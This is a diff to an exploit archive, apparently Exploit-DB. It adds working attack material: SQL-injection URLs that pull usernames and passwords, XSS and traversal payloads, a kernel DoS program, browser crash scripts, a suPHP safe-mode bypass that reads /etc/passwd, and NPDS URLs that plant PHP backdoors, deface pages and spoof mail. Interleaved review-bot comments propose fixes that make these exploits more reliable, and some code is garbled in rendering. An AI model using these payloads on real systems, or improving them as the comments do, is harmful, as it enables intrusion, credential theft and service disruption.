diff --git a/files.csv b/files.csv index f93aff1e7..1d559656f 100755 --- a/files.csv +++ b/files.csv @@ -29420,7 +29420,6 @@ id,file,description,date,author,platform,type,port 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0 -32659,platforms/hardware/webapps/32659.txt,"ICOMM 610 Wireless Modem - CSRF Vulnerability",2014-04-02,"Blessen Thomas",hardware,webapps,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32661,platforms/windows/remote/32661.html,"Evans FTP 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection Vulnerabilities",2008-12-14,baltazar,php,webapps,0 
@@ -29436,3 +29435,25 @@ id,file,description,date,author,platform,type,port 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service Vulnerability",2008-12-22,"Alfredo Ortega",linux,dos,0 +32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection Vulnerability",2008-12-19,"Moritz Naumann",php,webapps,0 +32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 'group-summary.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 'user-properties.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 'log.jsp' Cross-Site Scripting Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 'log.jsp' Directory Traversal Vulnerability",2009-01-08,"Federico Muttis",jsp,webapps,0 +32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 +32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x 'qdisc_run()' Local Denial of Service Vulnerability",2008-12-23,"Herbert Xu",linux,dos,0 +32683,platforms/asp/webapps/32683.txt,"Mavi Emlak 'newDetail.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32684,platforms/windows/remote/32684.c,"Microsoft Windows Media Player 9/10/11 WAV File Parsing Code Execution Vulnerability",2008-12-29,anonymous,windows,remote,0 +32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php 
manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0 +32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 +32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 +32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 +32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 +32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 +32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0 +32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0 +32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 +32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 +32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0 +32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0 diff --git a/platforms/asp/webapps/32683.txt b/platforms/asp/webapps/32683.txt new file mode 100755 index 000000000..d723d363f --- /dev/null 
+++ b/platforms/asp/webapps/32683.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33041/info + +Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/newDetail.asp?haberNo=-9999%20union%20select%200,username,password,3,4,5%20from%20Danismanlar \ No newline at end of file diff --git a/platforms/asp/webapps/32687.txt b/platforms/asp/webapps/32687.txt new file mode 100755 index 000000000..26258cdca --- /dev/null +++ b/platforms/asp/webapps/32687.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33045/info + +Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1 + +http://www.example.com/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 \ No newline at end of file diff --git a/platforms/hardware/dos/32692.txt b/platforms/hardware/dos/32692.txt new file mode 100755 index 000000000..5b7010445 --- /dev/null +++ b/platforms/hardware/dos/32692.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/33072/info + +Symbian S60 is prone to a denial-of-service vulnerability. + +Attackers can exploit this issue to prevent users from sending or receiving SMS or MMS messages. + +This issue affects handsets using Symbian S60. + +The following example message is available: + +"123456789@123456789.1234567890123 " + diff --git a/platforms/hardware/remote/32681.txt b/platforms/hardware/remote/32681.txt new file mode 100755 index 000000000..aaefb59b5 
--- /dev/null +++ b/platforms/hardware/remote/32681.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/32975/info + +COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities: + +- Multiple unauthorized-access vulnerabilities +- An information-disclosure vulnerability +- Multiple cross-site scripting vulnerabilities +- A denial-of-service vulnerability +- Multiple buffer-overflow vulnerabilities + +Attackers can exploit these issues to compromise the affected device, obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible. + +The following firmware versions are vulnerable; additional versions may also be affected: +CT-536 A101-302JAZ-C01_R05 +HG-536+ A101-302JAZ-C01_R05 and A101-302JAZ-C03_R14.A2pB021g.d15h + +http://www.example.com/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd http://www,example.com/password.html \ No newline at end of file diff --git a/platforms/hardware/webapps/32659.txt b/platforms/hardware/webapps/32659.txt deleted file mode 100755 index 389c171ef..000000000 --- a/platforms/hardware/webapps/32659.txt +++ /dev/null 
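Review bot: The last PoC line runs two URLs together, and the second one, `http://www,example.com/password.html`, has a comma where the host's first dot belongs, so it cannot be used as written; it should read `http://www.example.com/password.html` and presumably sit on its own line. The two URLs being on one line may be a rendering artifact, but the comma is in the URL text itself. The advisory also does not say which of the listed findings that second URL demonstrates (the unauthenticated-access or the information-disclosure item is the likely candidate); a one-line label next to each PoC would make the file usable without guessing.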
@@ -1,53 +0,0 @@ -Exploit Title : ICOMM 610 Wireless Modem CSRF Vulnerability - -Google dork : N/A - -Date : 02/04/2014 - -Exploit Author : Blessen Thomas - -Vendor Homepage : http://www.icommtele.com/ - -Software Link : N/A - -Version : ICOMM 610 - -Tested on : Device software version 01.01.08.991 (10/01/2010) - -Type of Application : Modem Web Application - -CVE : N/A - -Cross Site Request Forgery - -It was observed that this modem's Web Application , suffers from Cross-site - -request forgery through which attacker can manipulate user data via sending -him malicious craft url. - - -At attacker could change the password of the victim's account without the -victim's knowledge as the - -application is not having a security token implemented. - - -The Modem's application is not using any security token to prevent it -against CSRF. You can manipulate any userdata. PoC and Exploit to change -user password: In the POC the IP address in the POST is the modems IP -address. - - - - - - -
- - - - -
- - - diff --git a/platforms/jsp/webapps/32677.txt b/platforms/jsp/webapps/32677.txt new file mode 100755 index 000000000..ff38057a7 --- /dev/null +++ b/platforms/jsp/webapps/32677.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32937/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/group-summary.jsp?search=%22%3E%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32678.txt b/platforms/jsp/webapps/32678.txt new file mode 100755 index 000000000..c99c4f345 --- /dev/null +++ b/platforms/jsp/webapps/32678.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32938/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/user-properties.jsp?username=%3C[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32679.txt b/platforms/jsp/webapps/32679.txt new file mode 100755 index 000000000..b44e43a6d --- /dev/null +++ b/platforms/jsp/webapps/32679.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32940/info + +Openfire is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/log.jsp?log=%3Cimg%20src=%27%27%20onerror=%27[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/32680.txt b/platforms/jsp/webapps/32680.txt new file mode 100755 index 000000000..c01219c1e --- /dev/null +++ b/platforms/jsp/webapps/32680.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/32945/info + +Openfire is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. + +Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. + +Openfire 3.6.2 is vulnerable; prior versions may also be affected. + +http://www.example.com/log.jsp?log=..\..\..\windows\debug\netsetup \ No newline at end of file diff --git a/platforms/linux/dos/32682.c b/platforms/linux/dos/32682.c new file mode 100755 index 000000000..94942e200 --- /dev/null +++ b/platforms/linux/dos/32682.c 
@@ -0,0 +1,64 @@
+source: http://www.securityfocus.com/bid/32985/info
+
+The Linux kernel is prone to a local denial-of-service vulnerability.
+
+Local attackers can exploit this issue to cause a soft lockup, denying service to legitimate users.
+
+Versions prior to Linux kernel 2.6.25 are vulnerable.
+
+#include
+#include
+#include
+#include
+
+#define MAXTASKS 200
+int main(int argc, char *argv[])
+{
+ int i;
+ char cmd[128];
+ FILE *f;
+ pid_t pids[MAXTASKS];
+ pid_t pid;
+ unsigned int num;
+
+ if (argc < 3) {
+ printf("enter netserver hostname as the first parameter\n");
+ printf("enter number of netperf tasks as the second parameter\n");
+ return 1;
+ }
+
+ f = fopen("/dev/null", "w");
+ if (!f) {
+ printf("cannot open /dev/nu;;\n");
+ return 2;
+ }
+ sprintf(cmd, "netperf -H %s -l 60 -t UDP_STREAM -- -s 262144 -r 262144 -m 16384", argv[1]);
+
+ num = atoi(argv[2]);
+ if (num > MAXTASKS) {
+ printf("number of tasks is too high, resetting to %ld\n", MAXTASKS);
+ num = MAXTASKS;
+ }
+
+ for(i = 0; i < num; i++) {
+ pid = fork();
+ if (pid == 0) {
+ fclose(stdout);
+ fclose(stderr);
+ stdout = f;
+ stderr = f;
+ execl("/bin/sh", "/bin/sh", "-c", cmd, NULL);
+ }
+ else {
+ printf("newpid: %d\n", pid);
+ pids[i] = pid;
+ }
+ }
+ for(i = 0; i < num; i++) {
+ waitpid(pids[i], NULL, 0);
+ }
+
+ fclose(f);
+
+ return 0;
+}
diff --git a/platforms/linux/dos/32696.txt
new file mode 100755
index 000000000..71b1b7d5e
--- /dev/null
+++ b/platforms/linux/dos/32696.txt
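Review bot: `sprintf(cmd, "...", argv[1])` copies a caller-chosen hostname into the fixed 128-byte `cmd` with no bound; the fixed part of the format string is already about 63 bytes, so a host argument longer than roughly 64 characters overruns the stack buffer — use `snprintf(cmd, sizeof cmd, "netperf -H %s -l 60 -t UDP_STREAM -- -s 262144 -r 262144 -m 16384", argv[1]);`. In the fork loop the child has no exit path when `execl` fails, so it falls through and keeps forking as if it were the parent; add `_exit(127);` directly after the `execl` call. `printf("... resetting to %ld\n", MAXTASKS)` passes an `int` for `%ld`, which is undefined behaviour on LP64 targets — use `%d`. The four `#include` directives have lost their header names, presumably in rendering; the calls used need `<stdio.h>`, `<stdlib.h>`, `<unistd.h>` and `<sys/wait.h>`.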
@@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/33085/info + +KDE Konqueror is prone to multiple cross-site scripting vulnerabilities and multiple denial-of-service vulnerabilities because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or cause the affected browser to crash. + +KDE Konqueror 4.1 is vulnerable; other versions may also be affected. + +applications:/Here +trash:/Here +remote:/Here +applications:/THE GAME +applications:/ +]]> + + + + + diff --git a/platforms/osx/dos/32694.pl b/platforms/osx/dos/32694.pl new file mode 100755 index 000000000..b1d6fb3bd --- /dev/null +++ b/platforms/osx/dos/32694.pl @@ -0,0 +1,39 @@ +source: http://www.securityfocus.com/bid/33080/info + +Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. + +Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. + +Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. + +Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. + +#!/usr/bin/perl +# safari_webkit_ml.pl +# Safari (Webkit) 3.2 Remote Memory Leak Exploit +# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] +# Access violation when writing to [00000018] +# EIP 6B00A02B WebKit.6B00A02B +# LastError 00000008 ERROR_NOT_ENOUGH_MEMORY +# Memory leaks are common in browsers.. tested on Vista SP1 +# Compliments of bf2 + +$filename = $ARGV[0]; +if(!defined($filename)) +{ + + print "Usage: $0 \n"; + +} + +$head = "" . "\n"; +$trig = "" . "\n"; +$foot = ""; + +$data = $head . $trig . $foot; + + open(FILE, '>' . $filename); + print FILE $data; + close(FILE); + +exit; \ No newline at end of file 
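Review bot: The usage branch in 32694.pl only prints and never exits, so with no argument the script carries on and `open(FILE, '>' . $filename)` runs with an undefined `$filename`, and the return value of `open` is ignored in any case. Add `exit 1;` after the usage `print`, and check the open: `open(FILE, '>', $filename) or die "cannot open $filename: $!";`. The HTML assigned to `$head`, `$trig` and `$foot` appears here as empty strings, which looks like the markup was stripped in rendering rather than the file really being blank; worth confirming against the upstream copy, since as shown the generated page would trigger nothing.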
diff --git a/platforms/osx/dos/32695.php b/platforms/osx/dos/32695.php new file mode 100755 index 000000000..fe9ddbb05 --- /dev/null +++ b/platforms/osx/dos/32695.php @@ -0,0 +1,55 @@ +source: http://www.securityfocus.com/bid/33080/info + +Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. + +Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. + +Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. + +Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. + + +# ----------------------------------- +# Exploit Title: Apple iPhone Safari (body alink) Remote Crash +# Date: 19/12/2010 +# Author: Pr0T3cT10n +# Affected Version: IOS 4.0.1 +# Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari +# Launch Safari, point your browser to the page and safari will crash. +# ISRAEL, NULLBYTE.ORG.IL +$string = str_repeat('A', 12000085); +$code = " + + Apple iPhone Safari (body alink) Remote Crash + + + +"; +if(file_put_contents("./crash.html", $code)) { + echo("Point your safari mobile browser to `crash.html`.\r\n"); +} else { + echo("Cannot create file.\r\n"); +} +?> diff --git a/platforms/php/local/32693.php b/platforms/php/local/32693.php new file mode 100755 index 000000000..5c6aaa754 --- /dev/null +++ b/platforms/php/local/32693.php 
@@ -0,0 +1,70 @@ +source: http://www.securityfocus.com/bid/33073/info + +suPHP is prone to a 'safe_mode' restriction-bypass vulnerability. + +Successful exploits may allow attackers to bypass arbitrary PHP configuration options, including the 'safe_mode' setting. + +This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' restrictions assumed to isolate the users from each other. + + 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit +Author : Mr.SaFa7 +Home : v4-team.com +note : this exploit for education :) +*/ + + +echo "[+] Start...\n"; + +$bypfile=fopen('php.ini','w+'); +$stuffile=fopen('.htaccess','w+'); +if($bypfile and $stuffile!= NULL){ + +echo "[+] evil files created succes ! \n"; + +} +else{ +echo "[-] access denial ! \n"; + +} +$byprullz1="safe_mode = OFF + +"; + +$byprullz2="disable_functions = NONE"; +$dj=fwrite($bypfile,$byprullz1); + +$dj1=fwrite($bypfile,$byprullz2); + +fclose($bypfile); +if($dj and $dj1!= NULL){ +echo "[+] php.ini writed \n"; + +} +else{ +echo "[-] 404 php.ini not found !\n"; +} +$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path + +$sf7=fwrite($stuffile,$breakrullz); + +fclose($stuffile); +if($sf7!= NULL){ + +echo "[+] evil .htaccess writed\n"; +echo "[+] exploited by success!\n\n\n"; +echo "\t\t\t[+] discouvred by Mr.SaFa7\n"; +echo "\t\t\t[+] home : v4-team.com\n"; +echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n"; +} +else{ + +echo "[-] evil .htaccess Not found!\n"; +} + + +system("pwd;ls -lia;uname -a;cat /etc/passwd"); + +#EOF +?> diff --git a/platforms/php/webapps/32676.txt b/platforms/php/webapps/32676.txt new file mode 100755 index 000000000..8a6947566 --- /dev/null +++ b/platforms/php/webapps/32676.txt 
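Review bot: Each failure branch only echoes a message and falls through, so after "`[-] access denial !`" the script still calls `fwrite` on a `false` handle, writes the `.htaccess` anyway, and finishes with `system("pwd;ls -lia;uname -a;cat /etc/passwd")`; stop on failure instead, e.g. `$bypfile = fopen('php.ini', 'w+') or die("[-] access denial !\n");` and the same for the `.htaccess` handle. The `suPHP_ConfigPath` value hard-codes `/home/user/public_html/php.ini` and relies on a comment telling the user to edit it; building it from the script's own location, `"suPHP_ConfigPath " . dirname(__FILE__) . "/php.ini"`, removes the manual step and the chance of pointing suPHP at a path that does not exist. The opening `<?php` tag and the `/*` that should precede the header comment are not visible in the hunk, which looks like rendering rather than a defect in the file.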
@@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/32934/info + +PECL Alternative PHP Cache is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Alternative PHP Cache 3.1.1 and 3.0.19 are vulnerable; other versions may also be affected. + +A malicious user with local write access (such as an FTP user on shared +hosting environments) may create two directories + \ No newline at end of file diff --git a/platforms/php/webapps/32689.txt b/platforms/php/webapps/32689.txt new file mode 100755 index 000000000..01bbb53f2 --- /dev/null +++ b/platforms/php/webapps/32689.txt 
@@ -0,0 +1,304 @@ +source: http://www.securityfocus.com/bid/33051/info + +NPDS is prone to multiple input-validation vulnerabilities: + +- Multiple local file-include vulnerabilities +- An HTML-injection vulnerability +- Multiple SQL-injection vulnerabilities +- Multiple cross-site scripting vulnerabilities + +Exploiting these issues can allow an attacker to steal cookie-based authentication credentials, view and execute arbitrary local files within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible. + +Versions prior to NPDS 08.06 are vulnerable. + +http:/www.example.com/npds/modules/annonces/config.php?admin=1&tit=";%0Apassthru(stripslashes(urldecode($_GET['cmd'])));%0Aecho%20" +/npds/modules/annonces/config.php +Create backdoor and/or inject code into connect.inc.php file + + + BACKDOOR PHP + http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../test.php%00&lastfm_username=";%0Asystem($_GET['dir']);%0Aecho%20" + + DEFACE + http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../index.html%00&lastfm_username=";%0APHP?>OWNED%20BY%20NOSP +!!!Fichier : + + + + + + + +/npds/modules/upload/upload.php +Create backdoor and/or inject code into security.log file + + http:/www.example.com/npds/footer.php?Default_Theme=../logs\security.log%00 +/npds/footer.php +Include + + http:/www.example.com/npds/modules/annonces/affi_ann.php?ModPath=../../logs/security.log%00 +/npds/modules/annonces/affi_ann.php +Include + + http:/www.example.com/npds/modules/annonces/affi_img.php?ModPath=../../logs/security.log%00 +/npds/modules/annonces/affi_img.php +Include + + http:/www.example.com/npds/modules/affiche.php?ModPath=../../logs/security.log%00 +/npds/modules/annonces/affiche.php +Include + + http:/www.example.com/npds/modules/annul.php?ModPath=../../logs/security.log%00& +/npds/modules/annul.php 
+Include + + http:/www.example.com//npds/modules/block_partenaires.php?language=../../../../../../logs/security.log%00 +/npds/modules/block_partenaires.php +Include + + http:/www.example.com/npds/modules/chargement.php?ModPath=../../logs/security.log%00 +/npds/modules/chargement.php +Include + +\ + http:/www.example.com/npds/modules/deezer/admin/index.php?ModPath=../../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/deezer/admin/index.php?language=../../../../../../logs/security.log%00 +/npds/modules/deezer/admin/index.php +Include + + http:/www.example.com/npds/modules/deezer/deezer.php?language=../../../../../logs/security.log%00 +/npds/modules/deezer/deezer.php +Include + + http:/www.example.com/npds/modules/deezer/deezermod.php?language=../../../../logs/security.log%00 +/npds/modules/deezer/deezermod.php +Include + + http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../../../logs/security.log%00 +/npds/modules/G-annonces/admin/adm_ann.php +Include + + http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../logs/security.log%00 +/npds/modules/G-annonces/admin/index.php +Include + + http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00 +/npds/modules/G-annonces/annonce_form.php +Include + + http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/index.php +Include + + http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/list_ann.php +Include + + http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/modif_ann.php +Include + + http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/G-annonces/search.php +Include + + 
http:/www.example.com/npds/modules/GS-annonces/print.php?ModPath=../../../logs/security.log%00 +/npds/modules/GS-annonces/print.php +Include + + http:/www.example.com/npds/modules/last-fm/admin/adm.php?ModPath=../../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/last-fm/admin/adm.php?language=../../../../../logs/security.log%00 +/npds/modules/last-fm/admin/adm.php +Include + + http:/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../logs/security.log%00 +/npds/modules/last-fm/admin/adm_save.php +Include + + + http:/www.example.com/npds/modules/last-fm/error.php?ModPath=../../../../logs/security.log%00 ET +http:/www.example.com/npds/modules/last-fm/error.php?language=../../../../../logs/security.log%00 +/npds/modules/last-fm/error.php +Include + + http:/www.example.com/npds/modules/last-fm/last-fm.php?language=../../../../../../logs/security.log%00 +/npds/modules/last-fm/last-fm.php +Include + + http:/www.example.com/npds/modules/links/admin/create_tables.php?ModPath=../../../../logs/security.log%00/admin%00 +/npds/modules/links/admin/create_tables.php +Include + + http:/www.example.com/npds/modules/saisie.php?user=1&ModPath=../../logs/security.log%00 +/npds/modules/saisie.php +Include + + http:/www.example.com/npds/modules/td-galerie/admin/adm.php?ModPath=../../../.././logs/security.log%00 +/npds/modules/td-galerie/admin/adm.php +Include + + http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?ModPath=../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/td-glossaire/glossadmin.php?language=../../../../../logs/security.log%00 +/npds/modules/td-glossaire/glossadmin.php +Include + + http:/www.example.com/npds/modules/td-glossaire/glossaire.php?ModPath=../../../logs/security.log%00 OU +http:/www.example.com/npds/modules/td-glossaire/glossaire.php?language=../../../../../logs/security.log%00 +/npds/modules/td-glossaire/glossaire.php +Include + + 
http:/www.example.com/npds/modules/td-livredor/admin/livradmin.php?language=../../../../../../../logs/security.log%00 +/npds/modules/td-livredor/admin/livradmin.php +Include + + http:/www.example.com/npds/modules/td-livredor/envoi.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/envoi.php?language=.. +/../../../logs/security.log%00 +/npds/modules/td-livredor/envoi.php +Include + + http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=.. +/../../../logs/security.log%00 +/npds/modules/td-livredor/error.php +Include + + http:/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp:/www.example.com/npds/modules/td-livredor/error.php?language=.. +/../../../logs/security.log%00 +/npds/modules/td-livredor/error.php +Include + + http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00 +/npds/modules/td-livredor/livre.php +Include + + http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00 +/npds/modules/td-livredor/livre.php +Include + + http:/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../logs/security.log%00 +/npds/modules/td-livredor/livre.php +Include + + http:/www.example.com/npds/modules/TvGuide/index.php?ModPath=../../../logs/security.log%00 + http:/www.example.com/npds/modules/TvGuide/index.php?language=../../../logs/security.log%00 +/npds/modules/TvGuide/index.php +Include + + http:/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../index.php%00&op=modifier&HTTP_POST_VARS[code]=60000&id=1&table_annonces=annonces& +HTTP_POST_VARS[tel]=Owned%20!! 
+/npds/modules/G-annonces/modif_ann.php +Modify all comment without login/password + + http:/www.example.com/npds/friend.php?op=SendSite&yname=bill%20gates%20%0ATo:victime@poor.fr%0ASubject%20:%20XP%20SP%203%0A%0ADownload%2 +0last%20SP%203%20for%20Win%20XP%20in%20www.fakewebsite.com%0A&ymail=ex_pdg@microsoft.com&fname=jfl%0A&fmail=victim2@poor.net +/npds/friend.php +Send fake mail, spam + + + http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&ble_annonces=`users`/* +/npds/modules/G-annonces/index.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../index.php%00&table_annonces=annonces%20UNION%20SELECT%200,0,0,CONCAT(aid,char(58), +name,char(58),url,char(58),email,char(58),pwd,char(58)),0,0,0,0,0%20FROM%20authors/* +/npds/modules/G-annonces/list_ann.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../index.php%00&HTTP_POST_VARS[action]=ajouter&table_annonces=annonces%20UNION%20SELECT +%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char +(58)),0,0,0,0,0%20FROM%20authors/* +/npds/modules/G-annonces/search.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=annonces_cat%20UNION%20SELECT%20CONCAT(aid,char(58),name,char( 